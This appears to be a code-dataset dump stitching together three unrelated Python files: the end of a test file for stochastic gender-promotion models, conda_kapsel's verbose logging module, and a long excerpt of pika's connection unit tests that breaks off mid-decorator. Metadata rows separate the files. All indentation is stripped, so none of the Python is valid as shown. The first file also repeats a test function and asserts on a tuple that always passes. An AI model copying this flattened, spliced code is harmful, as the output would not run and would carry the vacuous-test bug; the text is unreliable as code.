t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
res = t.run_probability_analysis_parameter_sweep_gender_detail(10,
'female_promotion_probability_2',
'm2', 0.1, 0.8, 8, 150)
print(res)
assert (isinstance(res, pd.DataFrame))
# def test_base_model_probability_calc_plot(mock_data):
# t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
# t.plot_empirical_probability_group_detail(10,
# 'female_promotion_probability_2',
# 'm2', 0.1, 0.8, 8, 150)
#
# def test_comparison_empirical_probability_detail_plot(mock_data):
# modlist = list([Replication_model(**mock_data),
# Basic_stochastic_model(**mock_data),
# Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
# c = Comparison(modlist)
# c.plot_comparison_empirical_probability_detail(10,
# 'female_promotion_probability_2',
# 'm2', 0.1, 0.8, 20, 150)
# def test_plot_dept_size_over_time(mock_data):
# t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
# t.plot_department_size_over_time_multiple_runs(10)
# def test_plot_comparision_department_size(mock_data):
# modlist = list([Basic_stochastic_model_fixed_promotion(**mock_data),
# Basic_stochastic_model(**mock_data),
# Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
# c = Comparison(modlist)
# c.plot_comparison_department_size()
def test_multiple_runs_created_res_array(mock_data):
t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
t.run_multiple(10)
assert hasattr(t, 'probability_matrix')
#
# def test_plot_empirical_probability_gender_proportion(mock_data):
# t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
# t.plot_empirical_probability_gender_proportion(100, 0.19)
def test_plot_comparision_empirical_probability_gender_proportion(mock_data):
modlist = list([Basic_stochastic_model(**mock_data),
Basic_stochastic_model_fixed_promotion(**mock_data),
Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
c = Comparison(modlist)
c.plot_comparison_empirical_probability_gender_proportion(100, 0.19)
def test_basic_stochastic_with_random_dept_growth(mock_data):
t = Basic_stochastic_model(**mock_data)
assert (t.max_threshold, 0.1)
def test_basic_stochastic_with_random_dept_growth(mock_data):
t = Basic_stochastic_model(**mock_data)
assert (t.max_threshold, 0.1) | mit | -7,201,322,699,936,751,000 | 36.522124 | 116 | 0.638047 | false |
conda/kapsel | conda_kapsel/verbose.py | 1 | 1279 | # -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright © 2016, Continuum Analytics, Inc. All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# ----------------------------------------------------------------------------
"""Control verbose output."""
from __future__ import absolute_import
import logging
_verbose_loggers = []
def push_verbose_logger(logger):
"""Push a logger to log verbose messgaes."""
global _verbose_loggers
_verbose_loggers.append(logger)
def pop_verbose_logger():
"""Remove the most recently-pushed verbose logger."""
global _verbose_loggers
assert len(_verbose_loggers) > 0
_verbose_loggers.pop()
_cached_null_logger = None
def _null_logger():
global _cached_null_logger
if _cached_null_logger is None:
logger = logging.getLogger(name='conda_kapsel_null')
logger.addHandler(logging.NullHandler())
_cached_null_logger = logger
return _cached_null_logger
def _verbose_logger():
"""Used internal to conda-kapsel library to get the current verbose logger."""
if len(_verbose_loggers) > 0:
return _verbose_loggers[-1]
else:
return _null_logger()
| bsd-3-clause | -7,881,255,207,816,083,000 | 27.4 | 82 | 0.593114 | false |
pika/pika | tests/unit/connection_tests.py | 1 | 41689 | """
Tests for pika.connection.Connection
"""
# Suppress pylint warnings concerning access to protected member
# pylint: disable=W0212
# Suppress pylint messages concerning missing docstrings
# pylint: disable=C0111
# Suppress pylint messages concerning invalid method name
# pylint: disable=C0103
try:
import mock
except ImportError:
from unittest import mock # pylint: disable=E0611
import random
import platform
import unittest
import mock
from pika import connection, channel, credentials, exceptions, frame, spec
import pika
from pika.compat import xrange
def dummy_callback():
"""Callback method to use in tests"""
pass
class ConstructibleConnection(connection.Connection):
"""Adds dummy overrides for `Connection`'s abstract methods so
that we can instantiate and test it.
"""
def _adapter_connect_stream(self):
raise NotImplementedError
def _adapter_disconnect_stream(self):
raise NotImplementedError
def _adapter_call_later(self, delay, callback):
raise NotImplementedError
def _adapter_remove_timeout(self, timeout_id):
raise NotImplementedError
def _adapter_add_callback_threadsafe(self, callback):
raise NotImplementedError
def _adapter_emit_data(self, data):
raise NotImplementedError
class ConnectionTests(unittest.TestCase): # pylint: disable=R0904
def setUp(self):
class ChannelTemplate(channel.Channel):
channel_number = None
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
self.connection = ConstructibleConnection()
self.connection._set_connection_state(
connection.Connection.CONNECTION_OPEN)
self.connection._opened = True
self.channel = mock.Mock(spec=ChannelTemplate)
self.channel.channel_number = 1
self.channel.is_open = True
self.channel.is_closing = False
self.channel.is_closed = False
self.connection._channels[self.channel.channel_number] = self.channel
def tearDown(self):
del self.connection
del self.channel
@mock.patch('pika.connection.Connection._on_close_ready')
def test_close_calls_on_close_ready_when_no_channels(
self, on_close_ready_mock):
self.connection._channels = dict()
self.connection.close()
self.assertTrue(on_close_ready_mock.called,
'on_close_ready_mock should have been called')
@mock.patch('pika.connection.Connection._on_close_ready')
def test_close_closes_open_channels(self, on_close_ready):
self.connection.close()
self.channel.close.assert_called_once_with(200, 'Normal shutdown')
self.assertFalse(on_close_ready.called)
@mock.patch('pika.connection.Connection._on_close_ready')
def test_close_closes_opening_channels(self, on_close_ready):
self.channel.is_open = False
self.channel.is_closing = False
self.channel.is_closed = False
self.connection.close()
self.channel.close.assert_called_once_with(200, 'Normal shutdown')
self.assertFalse(on_close_ready.called)
@mock.patch('pika.connection.Connection._on_close_ready')
def test_close_does_not_close_closing_channels(self, on_close_ready):
self.channel.is_open = False
self.channel.is_closing = True
self.channel.is_closed = False
self.connection.close()
self.assertFalse(self.channel.close.called)
self.assertFalse(on_close_ready.called)
@mock.patch('pika.connection.Connection._close_channels')
def test_close_raises_wrong_state_when_already_closed_or_closing(
self, close_channels):
for closed_state in (self.connection.CONNECTION_CLOSED,
self.connection.CONNECTION_CLOSING):
self.connection.connection_state = closed_state
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.close()
self.assertEqual(self.channel.close.call_count, 0)
self.assertEqual(self.connection.connection_state, closed_state)
@mock.patch('logging.Logger.critical')
def test_deliver_frame_to_channel_with_frame_for_unknown_channel(
self, critical_mock):
unknown_channel_num = 99
self.assertNotIn(unknown_channel_num, self.connection._channels)
unexpected_frame = frame.Method(unknown_channel_num, mock.Mock())
self.connection._deliver_frame_to_channel(unexpected_frame)
critical_mock.assert_called_once_with(
'Received %s frame for unregistered channel %i on %s',
unexpected_frame.NAME, unknown_channel_num, self.connection)
@mock.patch('pika.connection.Connection._on_close_ready')
def test_on_channel_cleanup_with_closing_channels(self, on_close_ready):
"""if connection is closing but closing channels remain, do not call \
_on_close_ready
"""
self.channel.is_open = False
self.channel.is_closing = True
self.channel.is_closed = False
self.connection.close()
self.assertFalse(on_close_ready.called,
'_on_close_ready should not have been called')
@mock.patch('pika.connection.Connection._on_close_ready')
def test_on_channel_cleanup_closing_state_last_channel_calls_on_close_ready(
self, on_close_ready_mock):
self.connection.connection_state = self.connection.CONNECTION_CLOSING
self.connection._on_channel_cleanup(self.channel)
self.assertTrue(on_close_ready_mock.called,
'_on_close_ready should have been called')
@mock.patch('pika.connection.Connection._on_close_ready')
def test_on_channel_cleanup_closing_state_more_channels_no_on_close_ready(
self, on_close_ready_mock):
self.connection.connection_state = self.connection.CONNECTION_CLOSING
channel_mock = mock.Mock(channel_number=99, is_closing=True)
self.connection._channels[99] = channel_mock
self.connection._on_channel_cleanup(self.channel)
self.assertFalse(on_close_ready_mock.called,
'_on_close_ready should not have been called')
@mock.patch('pika.connection.Connection._on_close_ready')
def test_on_channel_cleanup_non_closing_state(self, on_close_ready):
"""if connection isn't closing _on_close_ready should not be called"""
self.connection._on_channel_cleanup(mock.Mock())
self.assertFalse(on_close_ready.called,
'_on_close_ready should not have been called')
def test_on_stream_terminated_cleans_up(self):
"""_on_stream_terminated cleans up heartbeat, adapter, and channels"""
heartbeat = mock.Mock()
self.connection._heartbeat_checker = heartbeat
self.connection._adapter_disconnect_stream = mock.Mock()
original_exc = Exception('something terrible')
self.connection._on_stream_terminated(original_exc)
heartbeat.stop.assert_called_once_with()
self.channel._on_close_meta.assert_called_once_with(original_exc)
self.assertTrue(self.connection.is_closed)
def test_on_stream_terminated_invokes_connection_closed_callback(self):
"""_on_stream_terminated invokes `Connection.ON_CONNECTION_CLOSED` callbacks"""
self.connection.callbacks.process = mock.Mock(
wraps=self.connection.callbacks.process)
self.connection._adapter_disconnect_stream = mock.Mock()
self.connection._on_stream_terminated(Exception(1, 'error text'))
self.connection.callbacks.process.assert_called_once_with(
0, self.connection.ON_CONNECTION_CLOSED, self.connection,
self.connection, mock.ANY)
with self.assertRaises(AssertionError):
self.connection.callbacks.process.assert_any_call(
0, self.connection.ON_CONNECTION_ERROR, self.connection,
self.connection, mock.ANY)
def test_on_stream_terminated_invokes_protocol_on_connection_error_and_closed(
self):
"""_on_stream_terminated invokes `ON_CONNECTION_ERROR` with \
`IncompatibleProtocolError` and `ON_CONNECTION_CLOSED` callbacks"""
with mock.patch.object(self.connection.callbacks, 'process'):
self.connection._adapter_disconnect_stream = mock.Mock()
self.connection._set_connection_state(
self.connection.CONNECTION_PROTOCOL)
self.connection._opened = False
original_exc = exceptions.StreamLostError(1, 'error text')
self.connection._on_stream_terminated(original_exc)
self.assertEqual(self.connection.callbacks.process.call_count, 1)
self.connection.callbacks.process.assert_any_call(
0, self.connection.ON_CONNECTION_ERROR, self.connection,
self.connection, mock.ANY)
conn_exc = self.connection.callbacks.process.call_args_list[0][0][
4]
self.assertIs(type(conn_exc), exceptions.IncompatibleProtocolError)
self.assertSequenceEqual(conn_exc.args, [repr(original_exc)])
def test_on_stream_terminated_invokes_auth_on_connection_error_and_closed(self):
"""_on_stream_terminated invokes `ON_CONNECTION_ERROR` with \
`ProbableAuthenticationError` and `ON_CONNECTION_CLOSED` callbacks"""
with mock.patch.object(self.connection.callbacks, 'process'):
self.connection._adapter_disconnect_stream = mock.Mock()
self.connection._set_connection_state(
self.connection.CONNECTION_START)
self.connection._opened = False
original_exc = exceptions.StreamLostError(1, 'error text')
self.connection._on_stream_terminated(original_exc)
self.assertEqual(self.connection.callbacks.process.call_count, 1)
self.connection.callbacks.process.assert_any_call(
0, self.connection.ON_CONNECTION_ERROR, self.connection,
self.connection, mock.ANY)
conn_exc = self.connection.callbacks.process.call_args_list[0][0][
4]
self.assertIs(
type(conn_exc), exceptions.ProbableAuthenticationError)
self.assertSequenceEqual(conn_exc.args, [repr(original_exc)])
def test_on_stream_terminated_invokes_access_denied_on_connection_error_and_closed(
self):
"""_on_stream_terminated invokes `ON_CONNECTION_ERROR` with \
`ProbableAccessDeniedError` and `ON_CONNECTION_CLOSED` callbacks"""
with mock.patch.object(self.connection.callbacks, 'process'):
self.connection._adapter_disconnect_stream = mock.Mock()
self.connection._set_connection_state(
self.connection.CONNECTION_TUNE)
self.connection._opened = False
original_exc = exceptions.StreamLostError(1, 'error text')
self.connection._on_stream_terminated(original_exc)
self.assertEqual(self.connection.callbacks.process.call_count, 1)
self.connection.callbacks.process.assert_any_call(
0, self.connection.ON_CONNECTION_ERROR, self.connection,
self.connection, mock.ANY)
conn_exc = self.connection.callbacks.process.call_args_list[0][0][
4]
self.assertIs(type(conn_exc), exceptions.ProbableAccessDeniedError)
self.assertSequenceEqual(conn_exc.args, [repr(original_exc)])
@mock.patch('pika.connection.Connection._adapter_connect_stream')
def test_new_conn_should_use_first_channel(self, connect):
"""_next_channel_number in new conn should always be 1"""
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection()
self.assertEqual(1, conn._next_channel_number())
def test_next_channel_number_returns_lowest_unused(self):
"""_next_channel_number must return lowest available channel number"""
for channel_num in xrange(1, 50):
self.connection._channels[channel_num] = True
expectation = random.randint(5, 49)
del self.connection._channels[expectation]
self.assertEqual(self.connection._next_channel_number(), expectation)
def test_add_callbacks(self):
"""make sure the callback adding works"""
self.connection.callbacks = mock.Mock(spec=self.connection.callbacks)
for test_method, expected_key in (
(self.connection.add_on_open_callback,
self.connection.ON_CONNECTION_OPEN_OK),
(self.connection.add_on_close_callback,
self.connection.ON_CONNECTION_CLOSED)):
self.connection.callbacks.reset_mock()
test_method(dummy_callback)
self.connection.callbacks.add.assert_called_once_with(
0, expected_key, dummy_callback, False)
def test_add_on_close_callback(self):
"""make sure the add on close callback is added"""
self.connection.callbacks = mock.Mock(spec=self.connection.callbacks)
self.connection.add_on_open_callback(dummy_callback)
self.connection.callbacks.add.assert_called_once_with(
0, self.connection.ON_CONNECTION_OPEN_OK, dummy_callback, False)
def test_add_on_open_error_callback(self):
"""make sure the add on open error callback is added"""
self.connection.callbacks = mock.Mock(spec=self.connection.callbacks)
#Test with remove default first (also checks default is True)
self.connection.add_on_open_error_callback(dummy_callback)
self.connection.callbacks.remove.assert_called_once_with(
0, self.connection.ON_CONNECTION_ERROR,
self.connection._default_on_connection_error)
self.connection.callbacks.add.assert_called_once_with(
0, self.connection.ON_CONNECTION_ERROR, dummy_callback, False)
def test_channel(self):
"""test the channel method"""
self.connection._next_channel_number = mock.Mock(return_value=42)
test_channel = mock.Mock(spec=channel.Channel)
self.connection._create_channel = mock.Mock(return_value=test_channel)
self.connection._add_channel_callbacks = mock.Mock()
ret_channel = self.connection.channel(on_open_callback=dummy_callback)
self.assertEqual(test_channel, ret_channel)
self.connection._create_channel.assert_called_once_with(
42, dummy_callback)
self.connection._add_channel_callbacks.assert_called_once_with(42)
test_channel.open.assert_called_once_with()
def test_channel_on_closed_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_CLOSED
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_closing_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_CLOSING
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_init_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_INIT
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_start_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_START
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_protocol_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_PROTOCOL
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_tune_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_TUNE
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_connect_no_adapter_connect_from_constructor_with_external_workflow(self):
"""check that adapter connection is not happening in constructor with external connection workflow."""
with mock.patch.object(
ConstructibleConnection,
'_adapter_connect_stream') as adapter_connect_stack_mock:
conn = ConstructibleConnection(internal_connection_workflow=False)
self.assertFalse(adapter_connect_stack_mock.called)
self.assertEqual(conn.connection_state, conn.CONNECTION_INIT)
def test_client_properties(self):
"""make sure client properties has some important keys"""
client_props = self.connection._client_properties
self.assertTrue(isinstance(client_props, dict))
for required_key in ('product', 'platform', 'capabilities',
'information', 'version'):
self.assertTrue(required_key in client_props,
'%s missing' % required_key)
def test_client_properties_default(self):
expectation = {
'product': connection.PRODUCT,
'platform': 'Python %s' % platform.python_version(),
'capabilities': {
'authentication_failure_close': True,
'basic.nack': True,
'connection.blocked': True,
'consumer_cancel_notify': True,
'publisher_confirms': True
},
'information': 'See http://pika.rtfd.org',
'version': pika.__version__
}
self.assertDictEqual(self.connection._client_properties, expectation)
def test_client_properties_override(self):
expectation = {
'capabilities': {
'authentication_failure_close': True,
'basic.nack': True,
'connection.blocked': True,
'consumer_cancel_notify': True,
'publisher_confirms': True
}
}
override = {
'product': 'My Product',
'platform': 'Your platform',
'version': '0.1',
'information': 'this is my app'
}
expectation.update(override)
params = connection.ConnectionParameters(client_properties=override)
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(params)
self.assertDictEqual(conn._client_properties, expectation)
def test_close_channels(self):
"""test closing all channels"""
self.connection.connection_state = self.connection.CONNECTION_OPEN
self.connection.callbacks = mock.Mock(spec=self.connection.callbacks)
opening_channel = mock.Mock(
is_open=False, is_closed=False, is_closing=False)
open_channel = mock.Mock(
is_open=True, is_closed=False, is_closing=False)
closing_channel = mock.Mock(
is_open=False, is_closed=False, is_closing=True)
self.connection._channels = {
'openingc': opening_channel,
'openc': open_channel,
'closingc': closing_channel
}
self.connection._close_channels(400, 'reply text')
opening_channel.close.assert_called_once_with(400, 'reply text')
open_channel.close.assert_called_once_with(400, 'reply text')
self.assertFalse(closing_channel.close.called)
self.assertTrue('openingc' in self.connection._channels)
self.assertTrue('openc' in self.connection._channels)
self.assertTrue('closingc' in self.connection._channels)
self.assertFalse(self.connection.callbacks.cleanup.called)
# Test on closed connection
self.connection.connection_state = self.connection.CONNECTION_CLOSED
with self.assertRaises(AssertionError):
self.connection._close_channels(200, 'reply text')
@mock.patch('pika.frame.ProtocolHeader')
def test_on_stream_connected(self, frame_protocol_header):
"""make sure the _on_stream_connected() sets the state and sends a frame"""
self.connection.connection_state = self.connection.CONNECTION_INIT
self.connection._adapter_connect = mock.Mock(return_value=None)
self.connection._send_frame = mock.Mock()
frame_protocol_header.spec = frame.ProtocolHeader
frame_protocol_header.return_value = 'frame object'
self.connection._on_stream_connected()
self.assertEqual(self.connection.CONNECTION_PROTOCOL,
self.connection.connection_state)
self.connection._send_frame.assert_called_once_with('frame object')
def test_on_connection_start(self):
"""make sure starting a connection sets the correct class vars"""
method_frame = mock.Mock()
method_frame.method = mock.Mock()
method_frame.method.mechanisms = str(credentials.PlainCredentials.TYPE)
method_frame.method.version_major = 0
method_frame.method.version_minor = 9
#This may be incorrectly mocked, or the code is wrong
#TODO: Code does hasattr check, should this be a has_key/in check?
method_frame.method.server_properties = {
'capabilities': {
'basic.nack': True,
'consumer_cancel_notify': False,
'exchange_exchange_bindings': False
}
}
#This will be called, but should not be implmented here, just mock it
self.connection._flush_outbound = mock.Mock()
self.connection._adapter_emit_data = mock.Mock()
self.connection._on_connection_start(method_frame)
self.assertEqual(True, self.connection.basic_nack)
self.assertEqual(False, self.connection.consumer_cancel_notify)
self.assertEqual(False, self.connection.exchange_exchange_bindings)
self.assertEqual(False, self.connection.publisher_confirms)
@mock.patch('pika.heartbeat.HeartbeatChecker')
@mock.patch('pika.frame.Method')
@mock.patch.object(
ConstructibleConnection,
'_adapter_emit_data',
spec_set=connection.Connection._adapter_emit_data)
def test_on_connection_tune(self,
_adapter_emit_data,
method,
heartbeat_checker):
"""make sure _on_connection_tune tunes the connection params"""
heartbeat_checker.return_value = 'hearbeat obj'
self.connection._flush_outbound = mock.Mock()
marshal = mock.Mock(return_value='ab')
method.return_value = mock.Mock(marshal=marshal)
#may be good to test this here, but i don't want to test too much
self.connection._rpc = mock.Mock()
method_frame = mock.Mock()
method_frame.method = mock.Mock()
method_frame.method.channel_max = 40
method_frame.method.frame_max = 10000
method_frame.method.heartbeat = 10
self.connection.params.channel_max = 20
self.connection.params.frame_max = 20000
self.connection.params.heartbeat = 20
#Test
self.connection._on_connection_tune(method_frame)
#verfy
self.assertEqual(self.connection.CONNECTION_TUNE,
self.connection.connection_state)
self.assertEqual(20, self.connection.params.channel_max)
self.assertEqual(10000, self.connection.params.frame_max)
self.assertEqual(20, self.connection.params.heartbeat)
self.assertEqual(9992, self.connection._body_max_length)
heartbeat_checker.assert_called_once_with(self.connection, 20)
self.assertEqual(
['ab'],
[call[0][0] for call in _adapter_emit_data.call_args_list])
self.assertEqual('hearbeat obj', self.connection._heartbeat_checker)
# Pika gives precendence to client heartbeat values if set
# See pika/pika#965.
# Both client and server values set. Pick client value
method_frame.method.heartbeat = 60
self.connection.params.heartbeat = 20
#Test
self.connection._on_connection_tune(method_frame)
#verfy
self.assertEqual(20, self.connection.params.heartbeat)
# Client value is None, use the server's
method_frame.method.heartbeat = 500
self.connection.params.heartbeat = None
#Test
self.connection._on_connection_tune(method_frame)
#verfy
self.assertEqual(500, self.connection.params.heartbeat)
# Client value is 0, use it
method_frame.method.heartbeat = 60
self.connection.params.heartbeat = 0
#Test
self.connection._on_connection_tune(method_frame)
#verfy
self.assertEqual(0, self.connection.params.heartbeat)
# Server value is 0, client value is None
method_frame.method.heartbeat = 0
self.connection.params.heartbeat = None
#Test
self.connection._on_connection_tune(method_frame)
#verfy
self.assertEqual(0, self.connection.params.heartbeat)
# Both client and server values are 0
method_frame.method.heartbeat = 0
self.connection.params.heartbeat = 0
#Test
self.connection._on_connection_tune(method_frame)
#verfy
self.assertEqual(0, self.connection.params.heartbeat)
# Server value is 0, use the client's
method_frame.method.heartbeat = 0
self.connection.params.heartbeat = 60
#Test
self.connection._on_connection_tune(method_frame)
#verfy
self.assertEqual(60, self.connection.params.heartbeat)
# Server value is 10, client passes a heartbeat function that
# chooses max(servervalue,60). Pick 60
def choose_max(conn, val):
self.assertIs(conn, self.connection)
self.assertEqual(val, 10)
return max(val, 60)
method_frame.method.heartbeat = 10
self.connection.params.heartbeat = choose_max
#Test
self.connection._on_connection_tune(method_frame)
#verfy
self.assertEqual(60, self.connection.params.heartbeat)
def test_on_connection_close_from_broker_passes_correct_exception(self):
"""make sure connection close from broker passes correct exception"""
method_frame = mock.Mock()
method_frame.method = mock.Mock(spec=spec.Connection.Close)
method_frame.method.reply_code = 1
method_frame.method.reply_text = 'hello'
self.connection._terminate_stream = mock.Mock()
self.connection._on_connection_close_from_broker(method_frame)
#Check
self.connection._terminate_stream.assert_called_once_with(mock.ANY)
exc = self.connection._terminate_stream.call_args[0][0]
self.assertIsInstance(exc, exceptions.ConnectionClosedByBroker)
self.assertEqual(exc.reply_code, 1)
self.assertEqual(exc.reply_text, 'hello')
def test_on_connection_close_ok(self):
"""make sure _on_connection_close_ok terminates connection"""
method_frame = mock.Mock()
method_frame.method = mock.Mock(spec=spec.Connection.CloseOk)
self.connection._terminate_stream = mock.Mock()
self.connection._on_connection_close_ok(method_frame)
#Check
self.connection._terminate_stream.assert_called_once_with(None)
@mock.patch('pika.frame.decode_frame')
def test_on_data_available(self, decode_frame):
"""test on data available and process frame"""
data_in = ['data']
self.connection._frame_buffer = ['old_data']
for frame_type in (frame.Method, spec.Basic.Deliver, frame.Heartbeat):
frame_value = mock.Mock(spec=frame_type)
frame_value.frame_type = 2
frame_value.method = 2
frame_value.channel_number = 1
self.connection.bytes_received = 0
self.connection._heartbeat_checker = mock.Mock()
self.connection.frames_received = 0
decode_frame.return_value = (2, frame_value)
self.connection._on_data_available(data_in)
#test value
self.assertListEqual([], self.connection._frame_buffer)
self.assertEqual(2, self.connection.bytes_received)
self.assertEqual(1, self.connection.frames_received)
if frame_type == frame.Heartbeat:
self.assertTrue(
self.connection._heartbeat_checker.received.called)
def test_add_on_connection_blocked_callback(self):
blocked_buffer = []
self.connection.add_on_connection_blocked_callback(
lambda conn, frame: blocked_buffer.append((conn, frame)))
# Simulate dispatch of blocked connection
blocked_frame = pika.frame.Method(
0,
pika.spec.Connection.Blocked('reason'))
self.connection._process_frame(blocked_frame)
self.assertEqual(len(blocked_buffer), 1)
conn, frame = blocked_buffer[0]
self.assertIs(conn, self.connection)
self.assertIs(frame, blocked_frame)
def test_add_on_connection_unblocked_callback(self):
unblocked_buffer = []
self.connection.add_on_connection_unblocked_callback(
lambda conn, frame: unblocked_buffer.append((conn, frame)))
# Simulate dispatch of unblocked connection
unblocked_frame = pika.frame.Method(0, pika.spec.Connection.Unblocked())
self.connection._process_frame(unblocked_frame)
self.assertEqual(len(unblocked_buffer), 1)
conn, frame = unblocked_buffer[0]
self.assertIs(conn, self.connection)
self.assertIs(frame, unblocked_frame)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
@mock.patch.object(connection.Connection,
'add_on_connection_blocked_callback')
@mock.patch.object(connection.Connection,
'add_on_connection_unblocked_callback')
def test_create_with_blocked_connection_timeout_config(
self, add_on_unblocked_callback_mock, add_on_blocked_callback_mock,
connect_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
# Check
conn.add_on_connection_blocked_callback.assert_called_once_with(
conn._on_connection_blocked)
conn.add_on_connection_unblocked_callback.assert_called_once_with(
conn._on_connection_unblocked)
@mock.patch.object(ConstructibleConnection, '_adapter_call_later')
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_connection_blocked_sets_timer(self, connect_mock,
call_later_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
# Check
conn._adapter_call_later.assert_called_once_with(
60, conn._on_blocked_connection_timeout)
self.assertIsNotNone(conn._blocked_conn_timer)
@mock.patch.object(ConstructibleConnection, '_adapter_call_later')
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_blocked_connection_multiple_blocked_in_a_row_sets_timer_once(
self, connect_mock, call_later_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
# Simulate Connection.Blocked trigger
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
# Check
conn._adapter_call_later.assert_called_once_with(
60, conn._on_blocked_connection_timeout)
self.assertIsNotNone(conn._blocked_conn_timer)
timer = conn._blocked_conn_timer
# Simulate Connection.Blocked trigger again
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
self.assertEqual(conn._adapter_call_later.call_count, 1)
self.assertIs(conn._blocked_conn_timer, timer)
@mock.patch.object(connection.Connection, '_on_stream_terminated')
@mock.patch.object(
ConstructibleConnection,
'_adapter_call_later',
spec_set=connection.Connection._adapter_call_later)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_blocked_connection_timeout_terminates_connection(
self, connect_mock, call_later_mock, on_terminate_mock):
with mock.patch.multiple(ConstructibleConnection,
_adapter_connect_stream=mock.Mock(),
_terminate_stream=mock.Mock()):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
conn._on_blocked_connection_timeout()
# Check
conn._terminate_stream.assert_called_once_with(mock.ANY)
exc = conn._terminate_stream.call_args[0][0]
self.assertIsInstance(exc, exceptions.ConnectionBlockedTimeout)
self.assertSequenceEqual(exc.args,
['Blocked connection timeout expired.'])
self.assertIsNone(conn._blocked_conn_timer)
@mock.patch.object(ConstructibleConnection, '_adapter_remove_timeout')
@mock.patch.object(
ConstructibleConnection,
'_adapter_call_later',
spec_set=connection.Connection._adapter_call_later)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_blocked_connection_unblocked_removes_timer(
self, connect_mock, call_later_mock, remove_timeout_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
self.assertIsNotNone(conn._blocked_conn_timer)
timer = conn._blocked_conn_timer
conn._on_connection_unblocked(
conn,
mock.Mock(name='frame.Method(Connection.Unblocked)'))
# Check
conn._adapter_remove_timeout.assert_called_once_with(timer)
self.assertIsNone(conn._blocked_conn_timer)
@mock.patch.object(ConstructibleConnection, '_adapter_remove_timeout')
@mock.patch.object(
ConstructibleConnection,
'_adapter_call_later',
spec_set=connection.Connection._adapter_call_later)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_blocked_connection_multiple_unblocked_in_a_row_removes_timer_once(
self, connect_mock, call_later_mock, remove_timeout_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
# Simulate Connection.Blocked
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
self.assertIsNotNone(conn._blocked_conn_timer)
timer = conn._blocked_conn_timer
# Simulate Connection.Unblocked
conn._on_connection_unblocked(
conn,
mock.Mock(name='frame.Method(Connection.Unblocked)'))
# Check
conn._adapter_remove_timeout.assert_called_once_with(timer)
self.assertIsNone(conn._blocked_conn_timer)
# Simulate Connection.Unblocked again
conn._on_connection_unblocked(
conn,
mock.Mock(name='frame.Method(Connection.Unblocked)'))
self.assertEqual(conn._adapter_remove_timeout.call_count, 1)
self.assertIsNone(conn._blocked_conn_timer)
@mock.patch.object(ConstructibleConnection, '_adapter_remove_timeout')
@mock.patch.object(
ConstructibleConnection,
'_adapter_call_later',
spec_set=connection.Connection._adapter_call_later)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
@mock.patch.object(
ConstructibleConnection,
'_adapter_disconnect_stream',
spec_set=connection.Connection._adapter_disconnect_stream)
